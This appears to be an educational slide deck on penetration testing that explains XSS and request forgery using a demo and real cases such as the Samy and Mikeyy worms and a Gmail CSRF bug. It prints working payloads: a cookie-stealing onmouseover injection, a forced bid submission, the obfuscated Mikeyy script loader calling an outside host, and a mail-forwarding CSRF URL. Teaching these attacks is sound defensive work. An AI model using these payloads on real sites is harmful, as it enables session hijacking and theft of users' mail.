2. What, why and how's of Penetration Testing - Amit Dhakad, Developer
3. What do I plan to cover?
   - What is Penetration Testing?
   - XSS: what is it? Types of XSS: reflected XSS, stored XSS
   - Request forgery: what is it? Types of request forgery: on-site request forgery, cross-site request forgery
   - Demo
   - Attack mechanisms
   - Real-world examples
   - Why do we need to pay attention?
11. Attack: the image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
   The closing quote ends the src attribute, so the rest of the value becomes an onmouseover handler that sends document.cookie to the attacker's log endpoint.
14. Attack with XSS: the image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
   Here the injected handler fills in and submits the page's own bid form on the victim's behalf.
17. Same-origin policy: a page on one origin can cause an arbitrary request to be sent to another origin, but it cannot itself read the response returned from that request. A page on one origin can, however, load a script from another origin and execute it within its own context.
18. What can you do with XSS and request forgery?
   - Session hijacking
   - Performing arbitrary actions
   - Disclosure of user data
20. MySpace worm by Samy (XSS + OSRF)
   - Bypassed all filters and added a script to his profile
   - The script did two things: it added the visiting user as a friend, and it copied itself into the visiting user's profile
   - Anyone visiting the newly infected user's profile also got added as Samy's friend
22. MySpace strips out the word "onreadystatechange", which is necessary for XMLHttpRequest callbacks
25. Mikeyy Twitter worm (XSS + OSRF)
   - Implemented by a 17-year-old boy
   - Injected value: "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
   - The String.fromCharCode call decodes to "<script src="http://www.stalkdaily.com/ajax.js"></script>"
   - Visiting users got infected
   - Infected users began tweeting unwittingly
26. Gmail vulnerability, discovered by Petko Petkov (CSRF)
   http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
   - Adds a filter that forwards all of the victim's email to the attacker's email address
27. Why do we need to pay attention?
   - The shift is towards attacking clients
   - Technologies don't provide strong protection
   - These are considered lame attacks
   - Identification using automated tools is difficult
   - Penetration testing is considered a separate vertical